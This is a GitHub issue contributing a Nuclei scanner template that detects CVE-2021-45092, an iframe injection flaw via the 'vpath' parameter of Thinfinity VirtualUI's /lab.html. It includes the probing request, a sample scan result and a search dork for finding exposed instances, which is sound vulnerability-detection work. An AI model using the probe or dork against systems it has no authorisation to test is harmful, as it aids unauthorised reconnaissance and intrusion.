Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-45092 - Improper access control allows iframe external endpoints #3360

Closed
danielmofer opened this issue Dec 16, 2021 · 0 comments · Fixed by #3372
Closed

CVE-2021-45092 - Improper access control allows iframe external endpoints #3360

danielmofer opened this issue Dec 16, 2021 · 0 comments · Fixed by #3372
Labels
nuclei-template Nuclei template contribution

Comments

@danielmofer
Copy link
Contributor

danielmofer commented Dec 16, 2021

Template Information:

CVE-2021-45092: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.

Reference

Nuclei Template:

id: CVE-2021-45092

info:
  name: Iframe functionallity
  author: danielmofer
  severity: medium
  description: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
  reference:
    - https://github.com/cybelesoft/virtualui/issues/2
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44848
    - https://www.tenable.com/cve/CVE-2021-45092
  tags: cve,cve2021,misconfiguration

requests:
  - raw:
      - |
        GET /lab.html?vpath=//wikipedia.com HTTP/1.1
        Host: {{Hostname}}
    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - ".*vpath.*"
        part: body

Example of the response:

[2021-12-12 00:00:00] [CVE-2021-45092] [http] [medium] http://example.com/lab.html?vpath=//wikipedia.com

To test it you can use the Google Dork: insite:"Thinfinity VirtualUI"

@danielmofer danielmofer added the nuclei-template Nuclei template contribution label Dec 16, 2021
@princechaddha princechaddha linked a pull request Dec 18, 2021 that will close this issue
2 tasks
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
nuclei-template Nuclei template contribution
Projects
None yet
Development

Successfully merging a pull request may close this issue.

1 participant